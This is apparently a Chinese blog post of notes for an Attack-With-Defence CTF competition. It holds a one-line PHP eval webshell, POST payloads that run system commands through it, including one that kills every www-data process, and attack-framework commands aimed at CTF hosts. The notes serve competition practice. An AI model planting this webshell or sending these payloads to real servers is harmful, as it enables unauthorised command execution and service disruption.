AWD笔记

作者: N0rmal | 来源:发表于2018-09-09 13:20 被阅读0次

AWD笔记

一、框架攻击脚本运行

测试,攻击npc

python run.py -m cqhk_exp2 -l 1 -t ctf.momomoxiaoxi.com:8815

正式攻击

python run.py -m cqhk_exp2 -c 'cat /flag' -c get_flag

二、杀不死马

  • 通用方法

    chmod 755 css
    cd css
    rm .d0xxxxxx.php & mkdir .doxxxxxx.php
    chmod 777 ../css
    
  • 自己种马杀www-data进程之后杀马
ps -ef|grep 'www-data' | awk '{print $2}'| xargs kill -9

杀不死马方式:

写入webshell.php

<?php 
@eval($_REQUEST['aa']);
?>

hackbar post

http://ctf.momomoxiaoxi.com:8802/css/webshell.php

post参数:

测试:

aa=system("ls");

正式:

aa=system("ps -ef|grep 'www-data' | awk '{print $2}'| xargs kill -9");

三、启动apache

/usr/sbin/apache2 -k start

四、工具

postman,类似hackbar

mamp , mac版php+mysql管理工具

transmit,mac版ftp工具

burpsuite,插件Reissue Request Scripter

相关文章

  • AWD笔记

    AWD笔记 一、框架攻击脚本运行 测试,攻击npc 正式攻击 二、杀不死马 通用方法chmod 755 csscd...

  • AWD攻略笔记

    AWD真好玩 开局一张图,内容全靠编 AWD是什么 Attack With Defence,简而言之就是你既是一个...

  • AWD

    思路 0x00 登入服务器并修改密码 linux常用命令查看用户名:who,whoami修改密码:passwd压缩...

  • 我的骄傲的

    AWD阿大为的

  • python使用技巧

    1 使用colorama库带颜色输出日志 2 pwn awd模板 awd模式千万不要使得单个脚本功能太过庞大,脚本...

  • CTF线下赛AWD小结(搬运+整理)

    AWD模式简介 AWD:Attack With Defence,比赛中每个队伍维护多台服务器,服务器中存在多个漏洞...

  • awd骚操作命令学习笔记

    alias Linux alias命令用于设置指令的别名。 用户可利用alias,自定指令的别名。若仅输入alia...

  • AWD-LSTM为什么这么棒?

    摘要:AWD-LSTM为什么这么棒,看完你就明白啦! AWD-LSTM是目前最优秀的语言模型之一。在众多的顶会论文...

  • xman结营赛总结

    XMAN 结营赛总结 第一次打awd线下赛,有点小慌乱,什么工具脚本都没有准备。因为讲怎么打awd的时候我在下面打...

  • CTF初次线下总结

    刚参加完2018年的江苏省领航杯的线下赛,总结一番。 这次线下赛的形式跟正常的AWD不同,原先准备的徐师傅的awd...

网友评论

      本文标题:AWD笔记

      本文链接:https://www.haomeiwen.com/subject/mxorgftx.html